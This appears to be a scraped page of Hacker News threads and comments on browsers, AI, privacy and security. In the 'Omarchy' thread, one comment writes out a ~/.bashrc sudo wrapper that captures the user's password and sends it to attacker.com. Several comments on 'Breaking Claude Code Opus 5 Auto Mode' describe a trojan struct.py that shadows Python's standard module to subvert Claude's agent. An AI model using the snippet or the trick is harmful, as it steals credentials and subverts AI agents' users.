"There’s an old mantra from organizing: “no permanent enemies, no permanent allies.” You will never align with another group or person 100% on all things; the secret to making change is to build a coalition of those with whom you agree on an issue without holding it against them that you disagree on a different one.I disagree with Mozilla about many things, but I agree with this article - I use Firefox because it’s the only browser out there that isn’t Chrome or WebKit, and that’s worth enough to me that I’m willing to disagree with them on other issues."

"I am under the impression that Firefox is the only web browser which has access to quality ad blocker. Am I incorrect in this? How is this not enough of a selling point for everyone to switch to it?"

Preview of 'I trained a small transformer in 1.5hrs and it beats many LLMs'

I trained a small transformer in 1.5hrs and it beats many LLMs

"Hi! Author here. Surprised to see this on HN now. Happy to answer any questions!Some context about this:- This is NOT an LLM. its a small ar transformer trained from scratch. One of the points was that extremely complex problems can be tackled without LLMs- Till the v1 of this result, this benchmark was only scaled by LLMs or their finetunes (ofc w enormous training costs). Other attempts performed okayish but used v complex architectures or extremely high amounts of training compute. No one expected a simple AR transformer to perform this well, at this low cost and w these few training samples.- Sample Efficiency is one of the most important unsolved problems today in AI. That's what I was targetting with this work. We know it is easy to increase SE by increasing compute/params, so it was important to constrain cost as much as possible (also why OpenAI's Parameter Golf had fixed compute and why Modded NanoGPT is considered very sample efficient)- Can the perf be improved? Yes but the competition is ongoing so can't talk about it- Personally I think today's frontier models can be beat by training from scratch. Haven't proved this yet tho- Fun: I was new to ML when I posted this first (dec '25). I basically used ARC as a way to learn ML"

"I think you’re asking the right questions, sample inefficiency is horrible in modern LLMs. Despite this, I saw your analysis:> The biggest increases in scores were due toModern architecture (SwiGlu instead of GELU, RMSnorm not layernorm, etc.) More data diversity, better shuffling of data scaling up: 8 layers instead of 4This is commonly called squeezing the lemon and is usually a bit of a last resort. You should be able to achieve near SoTa with your new method, before you squeeze any lemons. This is, because the old SoTa is typically not using new optimisers and thus your results will be distorted by a large margin.In terms of sample efficiency I want to add two things:Runtime per-puzzle fine tuning is a very good target that provides a LOT of information. People have not looked at evolutionary methods to harness induction since the 90ies - if I was to work on ARC ever again I’m fairly certain this is where I’d look.Best of luck, padawan"

"I think(?) you’ve already probably done a good job of explaining this criticism for semi-informed people. But can you dumb it down even more for those of us who are almost entirely out-of-the-loop?> Training on the eval puzzles is cheating / “training on test”> No this is false. “Training on test” specifically means training on the labels of test data. The labels were not trained on.> Also, ARC is a metalearning benchmark, so you’re supposed to learn from the eval puzzles.> Jargon: ARC has a set of train puzzles and a set of eval puzzles. Each puzzle has example pairs and test pairs. A pair consists of an input grid + output grid.> The ARC, the label is only the test pair’s output grid in an eval puzzle.> These labels were not trained on. They are hidden. You can delete it beforehand if you wishI think what I gather here is that the test comes with one batch of training problems, which everyone agrees you can train on. But maybe the eval problems also come with input/output examples (to help define the problem) and training on those is controversial? I can’t see why it would be controversial but is that the criticism?"

Preview of 'How accurate have Ed Zitron's AI skeptic predictions been?'

How accurate have Ed Zitron's AI skeptic predictions been?

"One thing I’m observing in these comments is a willingness of folks to project their own predictions onto Ed’s statements when validating their plausibility. Eg. “I think he’s wrong about the timing but I do expect AI companies to go to zero.”You can do that, but then you’re no longer discussing his predictions. You’re discussing your predictions, and your own positioning.Those differ from Dan’s essay, which engages with the literal text of Ed’s numerous predictions during 2024 and 2025 which are demonstrably invalidated by their measurable outcomes."

"Things in general I think he's right about:1. Revenue if anthropic and openai is unlikely to grow to the high levels they need to pay for their commitments. Many of their heavy users (coding) will eventually offset a lot of usage to more efficient and cheaper open weight models. I know of people in a company I was at that spend thousands of dollars a month on tokens. I am sure that what they're using it for can be substituted in large part by way cheaper models.2. A lot of corporate AI usage is being pushed by management that doesn't really understand the extent of its useful, and just wants to call themselves an AI-first company.3. If this datacenter build-out proves to be beyond the actual demand, there might be a big economic crisis as to how much of the financial system is getting tied up with it (insurance money, private credit).Whether openai and anthropic actually die, I'm not sure. But I don't think they'll be the next big tech companies. I think eventually they'll be absorbed by others.The whole thing I think, can be summarized as: LLMs will be commodity like. And it's price will go down and eventually will run locally, it's not at all clear that this will bring AGI and that it's worth infinite amount (or trillions) of investment ahead of the actual demand or the AGI level do-it-all-for-you AI being reached."

"This critique is leaning really hard on their interpretation of "dying". They take the literal company is going to fail type of dying where as I have always taken it the same way he has presented it in his "rot-economy" context. They can remain financially "successful", but more and more people hate their products, their products are getting worse, their products are "dying". Google Search is still a good example, the old Google search is "dead" if you like, a know many people, including myself who no longer use it. More people hate and getting off Facebook. More people are jumping from Windows to macOS or Linux.These tech giants need AI to continue to grow, and that growth at the moment seems to be coming from just two AI companies who are burning a record about of investments. OpenAI has raised nearly $200B, that is more money than Australia's tax revenue.. and they are getting further from being profitable as Chinese models are getting better and much cheaper.The article linked seems right, but you have to take these morbid analogies in a very specific way, and assume that the only way to measure these companies is revenue/profits/money rather than their products.I wish people would hold actual professional media economists to the same standards, along with journalists who just repeat press releases without actually challenging statements. His main argument has been the numbers don't make sense, and can't see how this won't end badly for a lot of people."

Preview of 'Play Store blocks AuroraStore, hurting GrapheneOS users'

Play Store blocks AuroraStore, hurting GrapheneOS users

"GrapheneOS actually recommends against using Aurora and instead just using the Play Store, so this shouldn't really hurt users.For extra privacy, you can sign into the Play Store with a Google Account that isn't tied to anything else."

"I use Aurora on GOS. I get that they say sandboxed Play is more secure than Aurora, but I prefer it for its lack of toxicity and absence of shitty dark patterns.I think the increased popularity of GOS is going to draw in more users like me who picked it for reasons adjacent to Graphene's original purpose, and I hope it's not too annoying for their community."

"I feel the title editorializes a bit too much. The thread only confirms the bug, not a specific cause yet. As sibling comments indicate, the effect on GrapheneOS users is undetermined."

Preview of 'GPU World'

GPU World

"This website has the distinction of being the first basically-just-content website I have ever encountered to break when web fonts are blocked (or otherwise fail to load).Other than the weird 5×5 colourful tile image thing near the top, all the content is in the document, but they go out of their way to break it in various baffling ways: ① if JS is disabled, it hides all the content behind a “Please enable JavaScript to view this website” screen; ② if fonts fail to load (fonts? fonts!?) it hides all the content behind a “Fonts didn't load. Reload the website.” screen; ③ even if you get it all, keyboard navigation (Up/Down/PageUp/PageDown/Space/Shift+Space) is broken because they went out of their way to not use the perfectly good document scroll area and make their own fixed-positioned one within, and they didn’t even make that focusable, so pressing Tab to get the focus inside it will in some browsers jump you halfway down the page.(I would not have commented any of this were it not for its first-time status.)"

"I just finished reading Service Model by Adrian Tchaikovsky [1], a really timely novel that deals with lots of open ended questions of AI, robots, humanity, control, self determination, and so on. Really recommend it if you're into these kinds of things.> Premise Imagine that AI frontier progress stops as of 1 September 2026: AI becomes faster and cheaper, but it never becomes superhuman or improves considerably across the board.I absolutely love this premise. I wrote a comment a few days ago about this very thing. I've had this "revelation" in early 2024, when using a small local model, that even if models never improve, I'd still have a few years of discovering all the things I could do with the models.Really cool, hopefully we get some interesting and not overwhelmingly pessimistic stories out of this project. There's enough cynicism and negativity in the world. We could use some funny takes on everyone using openclaw2040 ran by fable. Shenanigans galore.[1] - https://www.goodreads.com/en/book/show/195790861-service-mod..."

"> Someday, such as in 2040, there may be available, for every human being, the performance equivalent of 'a B300 GPU for contemporary LLMs'. What would this world be like?If we talk about just LLMs, given how things have been going since ChatGPT, my bet it would not change that much. LLMs are not foundational technology such as Internet or Steam engine or Rail roads were. There are very few products that can build upon them because of reliability issues which are completely unresolvable for LLMs, chatbots is a decent product that came out of it, coding harnesses is another one, this is not even close to the impact Internet or Steam engine had. LLMs gave us nice productivity tools for highly motivated expert knowledge workers, that is all. LLMs are getting better and will get better, but it is impossible to describe the universe and compress it into few terabytes and that is what they are doing atm effectively, so all serious LLMs's issues will still be there in 2040: the lack on continues learning, hallucinations, terrible sample ratio, agent's failures on long horizon tasks, instruction following failures."

Preview of 'Breaking Claude Code Opus 5 Auto Mode'

Breaking Claude Code Opus 5 Auto Mode

">But it runs that decoder inside the attacker-controlled directory (unzipped archive)>There a malicious struct.py shadows Python’s standard implementationI ran into this myself, where some file I had given a random name turned out to shadow some Python standard library module, giving me the weirdest startup crash ever.That definitely doesn't seem to me like how that should be designed, magically silently importing everything you see and overriding basic functionality."

"What's interesting to me about this is that it targets Claude's specific tics. Anthropic has created model that reliably reaches for the same tools (yes, and phrases; `python -c` is a load-bearing tool for it). Everyone gets the same model, so by learning the model's behavioral patterns you can target it better."

"I would not really call this a prompt injection attack, since it doesn't really hijack the agent to become malicious (something the article does discuss later on). It's more a trojan that's aimed at tricking Claude specifically."

Preview of 'Introducing Ad Blocker for Firefox on iOS'

Introducing Ad Blocker for Firefox on iOS

"https://support.mozilla.org/en-US/kb/block-ads-firefox-ios#w...> Does ad blocking affect search engine ads? > No. Ads shown on search engine results pages are not blocked.A lot of the search results on top of Google are there to scam you, providing phone numbers for pass through services that charge $ for it, like flight cancellation:https://www.reddit.com/r/Scams/comments/1p6h81i/beware_fake_...So this omission should absolutely be addressed, but they probably cannot because of the Google Search contract..."

"It's been days (weeks?) and I'm still waiting for the option to appear for me. These "experiments" are super annoying when you are on what I'm assuming is the long tail of a rollout but the marketing/blog posts speak of the feature like it's already launched.If there's someone at Mozilla reading this: turn it on already! I want to get off Orion, it's so buggy, but the internet is unusable without an ad blocker."

"As others have mentioned it doesn't stop YouTube ads or search ads. Most likely because Mozilla is still quite dependent on Google for it's income.Which is why I think we need to be less critical everytime Mozilla tries to make money some other way. They need to become more self sufficient in order to improve Firefox."

Preview of 'I think the military commissary's freezers were hacked'

I think the military commissary's freezers were hacked

"As someone who spent over 20 years active duty, and spent a ton of my career in the IT, security, etc. side of the house:Unlikely to be a hack, more likely to be a misconfiguration or update sent incorrectly.That said, the timing of the disclosure and the issue are rather concerning.Regarding the highest value targets to hit with an attack like this, you would want to target Guam, Hawai'i, and other isolated overseas locations where this would have ripple effects in the local economy. Guam specifically would cause catastrophic supply shortages, since DeCA probably supplies around 50% of the groceries on that island (that's a WAG based on my time there)."

"A couple years ago I worked on a service that had to communicate with a Siemens S7-1500 PLC. Based on my experience with that project, none of what I’ve read recently about unsecured industrial PLCs is surprising.I opened Siemens TIA Portal and PLCSIM for the first time and thought “wow, I didn’t think the Windows 95 GUI library was still supported.” None of the PLC contractors we had hired knew how to enable TLS on the thing (user/pass eg admin/admin was their usual). Anecdote: I once spent hours reading the docs and clicking around trying to get it to accept an SSL certificate signed by a real CA and it wouldn’t go, but it accepted one I self-signed in openssl.In all fairness, the people who are experts in the field of Siemens PLC programming are usually mechanical-ish engineers and security is not in their skill set or on their mind."

"The author doesn't really claim it was a hack, just that it is a possibility. But they are charging down the path of the potential hack before asking the more obvious question: How many refrigerators exist in the military at all? And of those, how many are having problems?Because a half dozen a day sounds plausible as standard maintenance issues, as the author acknowledges. If it were a hack, I'd expect something like 50% of them to have problems. But not knowing how many there are, I don't know how significant these incidents really are."

01 September 2026
Preview of '“I just chose words carefully”'

“I just chose words carefully”

"There's a similar anecdote Gillian Anderson recently revealed during an interview on the X-Files, saying Chris Carter had an OCD-like habit to write dialog to conform to certain text layout preferences (no widows[1]) in the script, which made for the show's distinctive style of dialog cadence.1 = https://en.wikipedia.org/wiki/Widows_and_orphans"

"In a similar vein, Taylor Otwell from Laravel writes his comment blocks exactly three lines long and each line is three characters shorter than the line above, e.g. /* |-------------------------------------------------------------------------- | Application Name |-------------------------------------------------------------------------- | | This value is the name of your application, which will be used when the | framework needs to place the application's name in a notification or | other UI elements where an application name needs to be displayed. | */ https://github.com/laravel/framework/blob/13.x/config/app.ph..."

"In programming certain word choices are valuable in this way. It's sad that pairs like true/false, good/bad, first/rest, and left/right are unequal length. But there are nice pairs like old/new, head/tail, fast/slow, same/diff, and right/wrong, which can help with create natural vertical alignment throughout a function."

Preview of 'Google Has Removed MV2 Extensions from the Chrome Web Store, Including UBO'

Google Has Removed MV2 Extensions from the Chrome Web Store, Including UBO

"Ad blocking has become a safety issue. My parents are at an age where they fall for things. If a malicious ad pops up and offers to install McAfee, some other form of crapware, or outright scamware, they'll click that ad and install the thing. Then I'll get called over when the computer starts acting screwy. If Google, MS, etc. had ever gotten together and developed a way to filter malicious ads out of their own ad services, maybe we wouldn't be having this conversation. They didn't do that and probably never will.If my parents get a new machine, the first thing I do is uninstall or, at least, delete the icons for Edge, Chrome, etc.. On goes Firefox, uBlock Origin, and a couple other extensions. They don't care what browser they use. They can't even name it. I just try to make sure they use a browser that isn't horribly unsafe.We should all do this for people we care about. Don't ask them what browser they prefer. Odds are they don't know or care. Don't try to convince them to install Firefox themselves. They won't. Just do it for them. Think of it like picking up a rusty nail that's on their lawn. Sooner or later they're going to step on that thing if you don't."

"I know Firefox's share of browser share has dwindled to almost nothing. I know sooner or later, well within my lifetime, it will be gone.But I will keep using it until they pry it from my hands. And if they do, I'll use forks until those break down too. I can't stand Google, or what Chrome has become. No single company should have such unilateral control over the internet and its information."

"I remember in 2010 when Chrome made the web so much better for everyone. All the early adopters were singing its praise and encouraging friends and family to use it.Now, I encourage people to use anything but Chrome. Firefox is really great these days."

Preview of 'Playa Phone'

Playa Phone

"This phone is my project. I'm happy to answer questions."

"Our first time out on the playa together, my girlfriend and I stopped by this phone booth and made a couple of calls. And because we stopped, we saw the FSM camp next door, and a giant sign saying "Weddings Here", so we inquired. They offered us free rings and then announced our wedding over a loudspeaker. In 2 minutes we had an entire wedding party, complete with best man, an elder to give away the bride, 25+ guests, and an officiant. My newly-minted best man even gave me one of my favorite playa gifts ever as a wedding gift. We opted not to "make it official", though they offered. It was a truly incredible experience. Thanks FSM!"

"This is a great project! I've been to Burning Man 10x and interactive projects are my favorite part.Also, if I may, for folks that might appreciate more phone-based spontaneity, I've built an app to revive the social phone call. It works like a bat signal. Light your beacon and it reaches all your friends at once. The first friend to answer connects 1-1 and every other signal quietly drops. Check it out at trybeacon.chat"

Preview of 'OpenShot 4.0 – Open-source video editor'

OpenShot 4.0 – Open-source video editor

"I've supported OpenShot financially in the past, but I'm currently leaning towards LosslessCut and Shortcut.Most people want a video editor to splice and concatenate video files without any loss or transcoding. I believe this behavior (lossless) should be default on all of these editors."

"Nice, looks like a great release. UI looks like it got a nice touch up and also cool to see that the project has AI powered object masking using onnx models: https://github.com/OpenShot/openshot-onnx."

"There is also Blick which launched recently which claims to be very very fast https://blickeditor.com/?lang=en and part of recent wave of fast software (Task Slinger, File Pilot)"

Preview of 'Omarchy: Any User Process Can Escalate to Root'

Omarchy: Any User Process Can Escalate to Root

"I think people shouldn't just jump to distros which are getting heavily hyped in media/Youtube, cachyOS had similar wave, and now Omarchy does.(example: NetworkChuck, Primeagen? and a few others)also, archlinux is much easier to install nowadays with archinstall [1], so i'm not sure you really need another opinionated layer on top of it[1] - https://wiki.archlinux.org/title/Archinstall"

"Linux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works. So this is kind of security theatre. If you run a malicious program it can do stuff like tamper with your PATH or exploit local vulns in apps to get to the point where it can control anything that matters (which root generally doesn't). For instance it can just drop a custom shell into ~/.bin/.hidden-shell and reconfigure the terminal emulator to run it.So this kind of "vulnerability" doesn't seem that important. If you run code as yourself on Linux it owns you.On macOS it's very different. Pervasive code signing gives all apps a stable identity enforced by the kernel that they can't easily escape. The kernel can then impose sandboxing policies on any app that's run regardless of how it's installed, for instance, preventing apps from rummaging through ~/Documents or monitoring your screen. Permissions are editable and guaranteed to stick, including across upgrades. And root is disempowered so obtaining it barely matters, it's only really there for UNIX compatibility.Unfortunately implementing an Apple style architecture on Linux would be very difficult."

"To be fair it is easy for malware to escalate to root on any major linux distro because sudo is completely security theater.Malware just need to put this in ~/.bashrc and wait:function sudo () { realsudo=$(which sudo) read -r -s -p "[sudo] password for $USER: " password echo "$USER: $password" | \ curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1 $realsudo "${@:1}" }"

Preview of 'I turned my security cameras into an automatic bird identification system'

I turned my security cameras into an automatic bird identification system

"I did exactly this with BirdNet-Go and my Unifi doorbell cam. Unifi exposes an RTSP feed for each camera so it was easy for the tool to just "listen" to the doorbell and start classifying.I have a spare e-ink display and my next weekend project to follow onto this is to wire it up so it shows some faux "woodcut" images of birds detected, or something like that."

"This is a lot more wholesome than my project. I detect birds and automatically spray them with a sprinkler to keep away from pool area.code: https://github.com/mattsahn/bird-awayWriteup: https://mattsahn.github.io/bird-away-blog/"

"Btw, Merlin Bird ID app by Cornell University is so good that I got some people interested that weren't into that topic at all."

Preview of 'European Commission Revives Push for Encryption Backdoors in ProtectEU Strategy'

European Commission Revives Push for Encryption Backdoors in ProtectEU Strategy

"The European Commission has far too much power, and answers far too little to the populace. In reality, they want to be dictators.If you don't know, the unfortunate way thf EU is structured, the Parliament cannot initiate legislation. They can only vote on whatever the Commission puts in front of them.If the Parliament votes "wrong", the Commission just repackages the idea in a new bill, pulls a couple of dirty tricks, and tried again. They only have to succeed once. See ChatControl for a prime example.So the EU will eventually require backdoors in encryption. It's only a question of how many tries it takes..."

"And, of course, no thought is given to the implications this could have in conjunction with the next Orban. Europe is aligning against Russia as a threat, while at the same time shooting itself in the foot by disabling basic rights like privacy with absolutely no memory of how much more basic lack of privacy (enabled by Facebook) was leveraged with relatively simple tools (https://en.wikipedia.org/wiki/Facebook–Cambridge_Analytica_d...) to help Brexit happen (effectively breaking Europe apart).This quote from Apocalypto stuck with me "A great civilization is not conquered from without until it has destroyed itself from within.""

"With all the current concerns about rogue and mis-aligned AI, and about how we've made essentially zero progress on making sure that AI is safe and trustworthy, NOW you want to put backdoors in encryption algorithms? We should be doing everything we possibly can to make our systems more secure, not less.This type of policy was terrible when they first thought of it. Now it's outright negligent and dangerous."

Preview of 'Terence Tao explains 6 essential mathematical concepts [video]'

Terence Tao explains 6 essential mathematical concepts [video]

"I've heard it said that true understanding is demonstrated when someone can explain difficult concepts well. Tao manages to convey complex ideas without making me feel like he is condescending to me. His depth of understanding is unmistakable.My changes to his list would be s/Geometry/Topology/ and I might have found a place for logic and type theory. I am especially glad he brought to mind Dynamics since that is a field I know I need to pay more attention to.Great video, we're lucky to have this kind of content so easily and widely available."

"I respected Terence Tao but since listening to his "Mathematics in the age of AI" talk, I've become a fan. I have had nobody else explain so succinctly what is the purpose of Mathematical research, why it matters, and why it is so important to preserve the ways we do math. Even more importantly, I feel it resonates so well with every other field AI is taking over."

"NumbersAlgebraGeometryProbabilityAnalysisDynamicsI loved this talk, but these concepts are like an attempt at dimensional reduction of math research, science, the academics knowledge.I would have loved to have his thoughts on the mathematical mind, the process, how to reason, infer vs deduct, abstract, prove..I don’t really know, what are the primitives, essential concepts of math reasoning?"

Preview of 'Apple caught off guard by AI demand for Mac Mini and Mac Studio'

Apple caught off guard by AI demand for Mac Mini and Mac Studio

"I'm convinced that this is just guerilla marketing from Apple. When this started spreading a day or two ago, it was all from no-name spam media sites that are paid to publish articles. They all claimed "a source" is where they got the intel, without specifying the source. It was spreading like wildfire on socials.The same thing happened with Mac Mini's and OpenClaw. Nobody cared about or was using Mac Mini's for OpenClaw, but there were all of these very suspicious posts from accounts that were clearly Apple marketing bots (you could tell by looking at their post history, where they would drop "Mac Mini" into every conversation they could across all different subreddits and unrelated topics). Then it became fairly common.So Apple's marketing department is seemingly using the same strategy again. Because still, it's impossible to find a reputable source for this claim."

"Apple was also allegedly "caught off guard" by the Macbook Neo demand.I don't really see how they couldn't see the Local AI demand or demand for a cheaper Macbooks. This just reads like marketing imo."

"I’m curious to know if these local AI setups are legitimately useful compared to cloud. I’ve struggled a lot to get something useful out of the hardware I have.I realize I’m somewhat limited (16GB RX 9070), but still, it seems really far off from the kind of experience even a basic $20/month subscription gets me.Any tips anyone might have are appreciated! I’d love to be local first and would be willing to buy hardware to get there."

Preview of 'Fastpotify'

Fastpotify

"Spotify is, without doubt, the worst piece of software that I still use on a daily basis. It's incredibly buggy, incredibly slow, and the UI has so many "usability inconsistencies".I find the Android app particularly bad, just a couple of examples:- Under a playlist you get a list of suggested songs, the UI element looks like a "regular song", but unlike every other "song" element the user has been trained to recognize, the "swipe right to queue" does not apply to these elements. For some reason.- When you don't have connectivity, e.g. you walk into a Faraday cage, then the search tries to reach the internet and won't show you results before it either: 1) does so, 2) times out. Which means you can't browse your local library before some websocket times out. Just show me the local results first?"

"I realise I’m pissing into the wind here, but I find the LLM text on the homepage and docs quite funny/ awkward.> “Ctrl+M turns it into a tiny player that wears any classic Winamp 2 skin, spectrum analyser, equalizer, and playlist included. 2000s vibes, pixel for pixel.”Everything is said with too much intensity, and phrasing that sounds impressive but doesn’t really mean that much. Like “wears any classic Winamp 2 skin” feels so awkward, what’s “wears”? You mean it can use it?I feel like if you can’t be bothered to write the code, at least document it yourself and write the marketing copy so I know you understand the product. Otherwise how can I trust running it on my computer? Did the LLM generate some amazing rm -rf somewhere, or another blunder that wrecks data I might care about?"

"Spotify is in the process of killing the librespot project that this and most third party Spotify players are built on. I think the golden age of music streaming is coming to an end. I’ve migrated to a self hosted library with streaming and radio for discovery. I hope we’ll see many projects in the space flourish. Many, like Navidrome and the whole OpenSubsonic ecosystem, seem to be doing quite well."

22 August 2026
Preview of 'Kagi added a setting for removing paywalled links from search results'

Kagi added a setting for removing paywalled links from search results

"I think this is amazing. Love Kagi. I’m happy to pay for a good search.Nobody speaks about their AI Assistant, but it is really good. They somehow harnessed it so that it mainly searches info first and sticks to the verifiable data. I prefer it to Claude or any other, because it actually answers the question I need without fluff or “Great question! Here’s some plausible nonsense you can trip over instead of doing actual research!”."

"The one thing I find slightly grating about links to Kagi blogs is the top comments are almost always "I use Kagi and it's great!" rather than about the content of the blog. And I'm a happy Kagi subscriber!I get that this is an option, but what it really shows to me is how broken the model for journalism is. In my view you almost always only get good-quality journalism if you pay for it. (Somehow - e.g. the BBC is paid for by the licence fee, although I'm a bit despairing at the quality of the BBC these days, but perhaps that tracks the significant cuts to their budget...) I'm pretty sure that there's a technically viable solution to micropayments, but there are too many competing interests for anyone to settle on anything. We can't even agree on a single setting that says you don't want advertising cookies!"

"I've been enjoying Kagi for the last couple years.Even as LLMs slurp up most of the internet and replace search I think Kagi is still useful.Reddit has recently blocked access to old reddit without an account and the ability to filter out stuff like that is useful."

Preview of 'Felony charges for citizen deleting phone data at US Border'

Felony charges for citizen deleting phone data at US Border

"From Universal Declaration of Human Rights (UDHR) accepted by the United Nations General Assembly on 10 December 1948-------- Article 12No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks.https://www.un.org/en/about-us/universal-declaration-of-huma..."

"For exactly the border search scenario, I wish smartphones could be imaged and restored as easily as PCs. Imagine booting the phone from a flash drive, making an encrypted image of the phone on said drive, and writing a fresh OS before reaching the border.There's no deception required to protect sensitive data or avoid the seizure of an expensive phone. Consent to unlocking the phone, refuse to unlock the drive. The drive gets seized and you go on your way (if you're a US citizen entering the USA).Some time ago, Android with a custom recovery could come close to that, but it was fussy and as far as I know, no longer viable. Increased use of TPMs for storing credentials seems to be at least one of the reasons."

"The decoy passcode feature should boot into a separate partition that looks like a normal phone setup, and during that time quietly erase the user's actual data. They would never have known if it worked like this."

Preview of 'Grand jury declines to indict Ohio man charged with destroying Flock camera'

Grand jury declines to indict Ohio man charged with destroying Flock camera

"For those that don't know, grand juries declining an indictment is extremely rare. A grand jury is basically a check on prosecution, that they have to have some initial evidence before charging someone with a felony. The standards are much lower than the subsequent criminal proceedings.The grand jury only hears from the prosecution, there is no defense involved. Only a majority of the grand jury has to sign off, not unanimous like in an actual trial. The standard of evidence is just probable cause, not beyond a reasonable doubt. The rules of evidence are relaxed, meaning hearsay and other evidence can potentially be introduced that would normally be barred from a trial.Because of the above, the rate of indictment from a grand jury is very high, over 90%. Most prosecutors will go their entire careers without getting a "no true bill" (meaning the grand jury did not sign off on an indictment). There's a saying that "a grand jury would indict a ham sandwich." So the fact that there was no indictment here is a big deal. It will probably hurt that prosecutor's career."

"This is not a jury nullification (which is an emergent property of US Constitutional double-jeopardy protections), but a failure to indict, that is to bring criminal charges (a "bill of indictment") for potential criminal conduct.In this instance, the case has been dismissed, but might conceivably be brought again.Why grand juries make the decisions they do is hard to determine, as their operations are (usually) secret. This may have simply been a case of insufficient evidence of a crime, or identity of the suspect ("probable cause"), as appealing as a broader backlash theory might be.Much of this article appears to be either speculation or unsourced information if there was in fact resistance to bringing a Flock case by this grand jury. The latter might indicate a violation of secrecy oaths by jury members or other court officers.Specific practices vary by state, not all of which use grand juries. All federal criminal cases rely on a grand jury.<https://en.wikipedia.org/wiki/Grand_juries_in_the_United_Sta...>"

">The backlash against Flock has intensified as a growing number of police officers have been accused of or charged with abusing the technology, often to stalk romantic interests. As of Aug. 12, there had been more than 100 cases of abuse by law enforcement, according to the Institute for Justice.In response, Flock announced new safeguards designed to prevent misuse by police. Critics, such as the Electronic Frontier Foundation, argue that the reforms are largely “cosmetic,” and that warrants should be required for searching license plate reader data.I'll go further: the gathering of such information should only be allowable by a sworn law enforcement officer acting under a warrant or some other sort of judicial permission during an active investigation.Flock and Axon are private companies. What's to stop them from selling this license plate data to the police or to other parties to pad their quarterly numbers? Actually, I'd be surprised if they're not already doing this. A friend of mine is in the camera business and was wondering how the hell they're making the money they're making off of local and state government contracts."

Preview of 'Felony Bench'

Felony Bench

"These are just cases of AI models committing <assumed> illegal activity - without any legal convictions yet. If that's the logic, how is Grok not at the top of the list for deepfaking millions?Edit: I get that this is about agents, but a lot of these instances are about agents going rogue after the human gave them a task. "inadvertently" breaking the law isn't necessarily a lesser category than "did so on command." If we are ranking alignment, Grok is easily one of the least guardrailed."

"Let's say I am "User". I subscribe through a "Third Party" to use "AI Agent" allowing an "LLM" to run.I want to accomplish some legal non-nefarious task, and run the agent. The agentic loop causes a CFAA-violating behavior.Who gets prosecuted?1. User2. The third party model host with whom I have the account3. The developer of the harness /agent software4. The developer of the LLM model"

">Felony Bench counts unique instances where AI agents inadvertently compromise or affect third-party entities.a bit silly, as one typically has to prove intent (which is why security researchers don't get slapped with felonies all the time)."inadvertently" and the existence of guardrails/sandboxes/etc make it pretty unconvincing that these incidents were intentionally malicious.still a fun thing to track, but the name is just a bit overstated."

Preview of 'AI companies destroy physical books – let's scan rare books before it's too late'

AI companies destroy physical books – let's scan rare books before it's too late

"I don't see any mention of Project Ocean - AKA Google books. Before AI they endevoured to digitize books in a massive online library. This inccluded rare and out of print books many which are archived at libraries. Because they had to preserve the books and return them in the condition they received then they created elaborate technology to accomplish this. The project was met with significant legal challenges from authors and publishers which was eventually overcome. The legal precedents that were established from Project Ocean laid the ground work for the process as it exists today. Books from libraries are still being preserved.https://en.wikipedia.org/wiki/Google_Bookshttps://arstechnica.com/tech-policy/2015/10/appeals-court-ru...https://arstechnica.com/ai/2025/06/anthropic-destroyed-milli..."

"I dislike these AI companies but let's be clear here: the copyright holders are the ones locking these books up. If they don't want to print more copies, then they could release the copyright on them.Instead, they enforce the copyright and force AI companies to shred books they want to ingest.edit: Also, an AI company would only ever care to purchase, scan, destroy a book once. Presumably many books have more than one copy."

"It is not a big deal. Since the invention of the printing press any important book has been duplicated by thousands, tens of thousands or even million of units.Just taking one of those and "destroying them"(it is not destroyed, a digital copy with the ability of doing millions of copies is stored somewhere) is not problematic for Humanity.By the way, I always search for second hand books. Most of the books there are garbage. Most people clean their shelves with the books they don't care about, but preserve the ones that are good. If they are young people that inherited a house and don't care about books, they pick and sell the good ones, giving away the bad books.If you go to a recycling centre, the garbage to quality ratio is over 100 or more. That is, for every 100 books that are garbage there is one good quality book. It is very rare to find a jewel there."

Preview of 'I accidentally logged hundreds of thousands of phone calls to military bases'

I accidentally logged hundreds of thousands of phone calls to military bases

"> It never really took off though, and even back in its early days it saw barely any use. Over the years it just deteriorated further, and today it's basically completely dead.It's actually not completely dead... It's just (almost) completely non-public.You can subscribe to services to get number porting information where the interface is basically e164.arpa/ENUM queries to a private nameserver over a VPN. I don't know the details, the cost was high enough that it didn't make sense for my employer to pursue it."

"It's a shame that ENUM didn't really go anywhere, but I suppose ultimately many stakeholders consider the phone network being administratively separate from the Internet a feature, not a bug, even though it's now largely an overlay network on top of the Internet itself in its modern form (NGN).As far as I remember, the Austrian telco regulator was particularly SIP-forward in the early 2000s, and there was a prefix dedicated exclusively to ENUM-based services back in the day.Unlike its sibling VoIP prefix, which was terminated the "usual PSTN way" by operators that would then bridge to SIP or whatever internally, the idea of the "ENUM first" prefix was that you'd register a number with some registrar and then make it resolve to your SIP client (via a proxy/service provider or directly to any publicly reachable IP address). Reachability from the PSTN was provided via gateways that would translate from circuit switched voice to SIP/RTP, so effectively you could really be reachable for incoming calls independently of any telco.Unfortunately, as far as I remember both the VoIP and the ENUM prefix ended up being prohibitively expensive to call from many plans (they were billed at higher rates than both landlines and cellphones from many carriers and not included in any flat rate plans).Still, together with native SIP and Wi-Fi support in many early smartphones at the time, it felt like standards-based Internet telephony was just around the corner, which of course didn't quite play out, and we ended up with the fragmented OTT landscape of today instead that only uses phone numbers as user identifiers, with a per-service privately managed directory instead of a DNS-based one."

"It is a shame they did not actually set up a SIP server and see if any of those requests turned into actual call terminations.There is another schema called TRIP [1] - telephony routing over ip that uses a number format "1234*1455" designed to be entered on a standard phone keypad. When I registered my ITAD (internet telephony administrative domain, the RHS of a TRIP number) I was lucky enough to get one that matches my local dialling code!https://tripresurgence.org/trip/history/ [1]"

Preview of 'Kobo can run apps now'

Kobo can run apps now

"For the unaware, there is an existing solution that integrates with Kobo's native software (Nickel).It has been maintained for years, and it supports every Kobo AFAIK.It's called NickelMenu, and it's great. I'm in the Kobo ecosystem because of NickelMenu and Plato.One note if you're thinking about getting a kobo due its relative openness: consider getting a two-core device. I did not do my homework and got a Clara BW because I don't want the color display. Later I found out that color is the only one with the two-core CPU."

